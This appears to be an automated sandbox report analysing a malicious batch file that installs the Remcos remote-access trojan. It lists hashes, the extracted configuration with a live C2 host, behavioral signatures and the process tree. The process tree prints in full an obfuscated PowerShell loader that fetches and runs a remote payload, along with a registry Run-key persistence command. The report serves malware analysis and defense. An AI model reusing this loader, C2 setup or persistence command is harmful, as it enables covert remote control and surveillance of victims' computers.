Overview

overview

10

Static

static

1

rEXSP5634H...et.bat

windows7-x64

10

rEXSP5634H...et.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    22/10/2024, 05:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat

  • Size

    5KB

  • MD5

    e6e618c4354c26c555872d5398a72086

  • SHA1

    76cddb6019c5d76a96de461a85742d766feebca8

  • SHA256

    e0d9ebe414aca4f6d28b0f1631a969f9190b6fb2cf5599b99ccfc6b7916ed8b3

  • SHA512

    0251b7c4f32ad218628d5e71bd80f909e4c124420e47e434b622e280253189e615206d6f6846ac63d66af14500054f38b15f473f5725b541c6921c03e23fea87

  • SSDEEP

    96:/ZAmDvLJYo/4xtgIYzTSWteyhFeeOFXsQOEPoxFft7K3/XG3gWTE:amDzafszOaNCXPOkYjKPQgWI

Score
10/10
remcosmiss chydiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

MISS Chy

C2

pelele.duckdns.org:51525

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-TXCR8B

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2584
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; function Dtente($Sizier){If ($Chromoisomerism) {$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes; for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand ';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0 .nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94 (Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP Ma.LencoiambutPros( han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente 'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,roe MectBredh lfmanonenWrise Mae ');$Lumpingly=Dtente ' ssi$C unGFo be Orks umrt,riauCrousBrmeeD tar remnGidseFeto.,rdkD opioSanawOttenUnefl TotoIndtaRnk,dUdebF Mari UdllVaabeBrdr( Kas$CirkGCaseePoz o rthpStenhS ako orrnUdvieWeddsCloi,Stan$Pla AOplyaNastuorro)Fili ';$Aau=$Roose110;Trindt94 (Dtente ',ffo$Do.kgStopLC,mpOripsBHaraAS lilKn c:P ctNIndeEEffld uesMa,ylTrilaGastG orft RulEShe,n AgndO,ereJob.= ags(Assut Hy eNonrsOvertrest-S pePJambaBevitGalih Sta Fad$ObelAPre a LevuAmet) Fab ');while (!$Nedslagtende) {Trindt94 (Dtente 'unex$KopigRaffl GenoIrrebina.aWuchlT.ch:TeboPHieriIndvlMedifU.efe Fr,r .aaeQtd rSubdstzar=Inex$,ikttSandrO ttuAr bea ar ') ;Trindt94 $Lumpingly;Trindt94 (Dtente ' yposKupeTKrykale erEmbrTKoge- Ca,SPo yLT caeSkate Prop Bel Skov4fant ');Trindt94 (Dtente 'Abb $Ma.lgDewhl K aoStinBSansAUds lR nd:Bru N l vE Raad KomsSal lIn eaOuttG vertmi rEForrnDi hDBinreArti=Gluc( nmitTykke AkksAukttVa,i-HorapNa.pATi cTMo khDeco Uso,$ samARemoA Q auAcqu)Plad ') ;Trindt94 (Dtente 'Drtr$ rkeG.undLAfkoO ArrBStifARiveLsupe: ,awBFemin R wNJordeFjerNDigt=Begr$P ragParilFagmoFi gbL,ndAThorL Kyn:Aho,SJen tUpstEIndtl,ntrlSophe Em.R draIDerid Be +Auto+ Re % F.u$ Cytu Galn GeldBieneUdreTGlobEKuv R U,miIst o.eknrChocAbradtPapii de nSev gA,ta.M crC TaloSy oUAr mNChevTEn,a ') ;$Geophones=$Undeteriorating[$Bnnen];}$Ahorntrets=344157;$Sknhedsdronningerne=29981;Trindt94 (Dtente 'Angl$PoligHv.vl.agrO YesB riASpidLForb: PreATophlOp kQModeULftei M sfIm.rO ForU Ers1Vare1P,ll9Prog Tam =Treh MyriGChefEBasitRens-Sedac GlaO br.nLo.iTKao E crunSandTNone Mini$BifiABarra UdfU Aut ');Trindt94 (Dtente 'Bi l$O tmgInd lQuinoLecab CoraF,rhlNati:Ba.gSSrprt Hino NavfOvermT aanFomegTarrd F,ae ArbnRe es Bun As e= Bur B nk[XenoSErkeyRecksApnet D,deKnojmKron.InteC hi,oProln SutvS,nke roar Sv tGri ] Cho:Best:Te eFKamprIntroRet mForsBUnreaUplisSubee Spe6 An 4 keSHarptInter ideiSpecnAdd gUran(Rat $ProsAC ocl RigqMalfuSkagiAmidfHoeroMoniuComf1Stri1Feli9 Mas)Sp,n ');Trindt94 (Dtente ' ype$Be.oGCousLRa dOKameBFru aU mil run:hoveDpotaaRockRErhvKPyrhsFil, Mou=Syvm Bere[ rinSfrdsY MasS Rvet KleETilmmFisk.Syntt HjeeUninXU.iltmikr. niteBjarNUmbrcPar o roaDcongiTromnmouzg X n]Stra:Pate: DivaAfsysPterCMariIHuleiN.nf. afsgEufoeDeraTNonpsS,leTC onrIndlIBoofN Sapg cyc( nte$Roqus EjetMurnoUndefnuptm ReknStikGCuidd Ph EHertNStensuini) Sa ');Trindt94 (Dtente 'Tils$HansgMontLVv.ro re.BPrv ACololHema:.ootH ffoF.emvdiffeDye kBi.bA KatTramiaPr,fl S bOVs nGTi,seHel tVe,m=Dipl$EngldIndiARestRVigekReviS Nu.. NonsUnreuOut.bLev,SPh.etBorgRSjklIR glnRapsGRe.i(Knla$FeteaVenlHAktioTongrStdenSti TFor rCongeSo.iT,iliSP,nt,sluk$AftasDds.kGud,nMetahE,zoEUnweDK,ivsparedKo,tRfleeoFugtN patnDeciIsupeNTromgDypneMelaRTrusNDer EMas )An i ');Trindt94 $Hovekataloget;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2528
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; function Dtente($Sizier){If ($Chromoisomerism) {$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes; for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand ';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0 .nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94 (Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP Ma.LencoiambutPros( han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente 'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,roe MectBredh lfmanonenWrise Mae ');$Lumpingly=Dtente ' ssi$C unGFo be Orks umrt,riauCrousBrmeeD tar remnGidseFeto.,rdkD opioSanawOttenUnefl TotoIndtaRnk,dUdebF Mari UdllVaabeBrdr( Kas$CirkGCaseePoz o rthpStenhS ako orrnUdvieWeddsCloi,Stan$Pla AOplyaNastuorro)Fili ';$Aau=$Roose110;Trindt94 (Dtente ',ffo$Do.kgStopLC,mpOripsBHaraAS lilKn c:P ctNIndeEEffld uesMa,ylTrilaGastG orft RulEShe,n AgndO,ereJob.= ags(Assut Hy eNonrsOvertrest-S pePJambaBevitGalih Sta Fad$ObelAPre a LevuAmet) Fab ');while (!$Nedslagtende) {Trindt94 (Dtente 'unex$KopigRaffl GenoIrrebina.aWuchlT.ch:TeboPHieriIndvlMedifU.efe Fr,r .aaeQtd rSubdstzar=Inex$,ikttSandrO ttuAr bea ar ') ;Trindt94 $Lumpingly;Trindt94 (Dtente ' yposKupeTKrykale erEmbrTKoge- Ca,SPo yLT caeSkate Prop Bel Skov4fant ');Trindt94 (Dtente 'Abb $Ma.lgDewhl K aoStinBSansAUds lR nd:Bru N l vE Raad KomsSal lIn eaOuttG vertmi rEForrnDi hDBinreArti=Gluc( nmitTykke AkksAukttVa,i-HorapNa.pATi cTMo khDeco Uso,$ samARemoA Q auAcqu)Plad ') ;Trindt94 (Dtente 'Drtr$ rkeG.undLAfkoO ArrBStifARiveLsupe: ,awBFemin R wNJordeFjerNDigt=Begr$P ragParilFagmoFi gbL,ndAThorL Kyn:Aho,SJen tUpstEIndtl,ntrlSophe Em.R draIDerid Be +Auto+ Re % F.u$ Cytu Galn GeldBieneUdreTGlobEKuv R U,miIst o.eknrChocAbradtPapii de nSev gA,ta.M crC TaloSy oUAr mNChevTEn,a ') ;$Geophones=$Undeteriorating[$Bnnen];}$Ahorntrets=344157;$Sknhedsdronningerne=29981;Trindt94 (Dtente 'Angl$PoligHv.vl.agrO YesB riASpidLForb: PreATophlOp kQModeULftei M sfIm.rO ForU Ers1Vare1P,ll9Prog Tam =Treh MyriGChefEBasitRens-Sedac GlaO br.nLo.iTKao E crunSandTNone Mini$BifiABarra UdfU Aut ');Trindt94 (Dtente 'Bi l$O tmgInd lQuinoLecab CoraF,rhlNati:Ba.gSSrprt Hino NavfOvermT aanFomegTarrd F,ae ArbnRe es Bun As e= Bur B nk[XenoSErkeyRecksApnet D,deKnojmKron.InteC hi,oProln SutvS,nke roar Sv tGri ] Cho:Best:Te eFKamprIntroRet mForsBUnreaUplisSubee Spe6 An 4 keSHarptInter ideiSpecnAdd gUran(Rat $ProsAC ocl RigqMalfuSkagiAmidfHoeroMoniuComf1Stri1Feli9 Mas)Sp,n ');Trindt94 (Dtente ' ype$Be.oGCousLRa dOKameBFru aU mil run:hoveDpotaaRockRErhvKPyrhsFil, Mou=Syvm Bere[ rinSfrdsY MasS Rvet KleETilmmFisk.Syntt HjeeUninXU.iltmikr. niteBjarNUmbrcPar o roaDcongiTromnmouzg X n]Stra:Pate: DivaAfsysPterCMariIHuleiN.nf. afsgEufoeDeraTNonpsS,leTC onrIndlIBoofN Sapg cyc( nte$Roqus EjetMurnoUndefnuptm ReknStikGCuidd Ph EHertNStensuini) Sa ');Trindt94 (Dtente 'Tils$HansgMontLVv.ro re.BPrv ACololHema:.ootH ffoF.emvdiffeDye kBi.bA KatTramiaPr,fl S bOVs nGTi,seHel tVe,m=Dipl$EngldIndiARestRVigekReviS Nu.. NonsUnreuOut.bLev,SPh.etBorgRSjklIR glnRapsGRe.i(Knla$FeteaVenlHAktioTongrStdenSti TFor rCongeSo.iT,iliSP,nt,sluk$AftasDds.kGud,nMetahE,zoEUnweDK,ivsparedKo,tRfleeoFugtN patnDeciIsupeNTromgDypneMelaRTrusNDer EMas )An i ');Trindt94 $Hovekataloget;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2716
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3016
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1724
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:340

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\63NW3LQ18UZCH0ARNVFL.temp
    Filesize

    7KB

    MD5

    ec04c921456b58beb806199c5487662d

    SHA1

    f67af045a196eb02742345be87119640b26d2883

    SHA256

    f4e45c32bee6bb058cd0ccd742043264de2f77295ce0a6ce382269d6db5bcd68

    SHA512

    3508b043c4f42de94b2a5da759bd1df0bdf51c55a8b0b83c40ee6b6182bce82ebc8a43ba895154525af7983f30249af8b7d7f1cf2ac159e3457caeb72b1dfd40

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Overtidsbetalings.Del
    Filesize

    487KB

    MD5

    2bddc5ba5ca1835b93004447e25041e5

    SHA1

    f494fc24f0056c569750f90f8325b6cc011919d2

    SHA256

    e28a506c658753a74aec3611452c57cb09c8c4da75d285661ac1a6450a1d4afd

    SHA512

    13f77faecbc1b255e04684ac3732f14f156281c17b961275523073a20f98bc029430cbc7adb6ae9848f2823035eeab31758e9790a018f46627ffb04fa0643515

    Download Submit

  • memory/2528-13-0x000007FEF6810000-0x000007FEF71AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2528-15-0x000007FEF6810000-0x000007FEF71AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2528-9-0x000007FEF6810000-0x000007FEF71AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2528-8-0x000007FEF6810000-0x000007FEF71AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2528-10-0x000007FEF6810000-0x000007FEF71AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2528-12-0x000007FEF6ACE000-0x000007FEF6ACF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2528-4-0x000007FEF6ACE000-0x000007FEF6ACF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2528-7-0x000007FEF6810000-0x000007FEF71AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2528-6-0x00000000003C0000-0x00000000003C8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2528-5-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2716-19-0x0000000006880000-0x000000000B3D8000-memory.dmp

    Filesize

    75.3MB

    Download

  • memory/3016-20-0x0000000000880000-0x00000000018E2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/3016-34-0x0000000000880000-0x00000000018E2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/3016-38-0x0000000000880000-0x00000000018E2000-memory.dmp

    Filesize

    16.4MB

    Download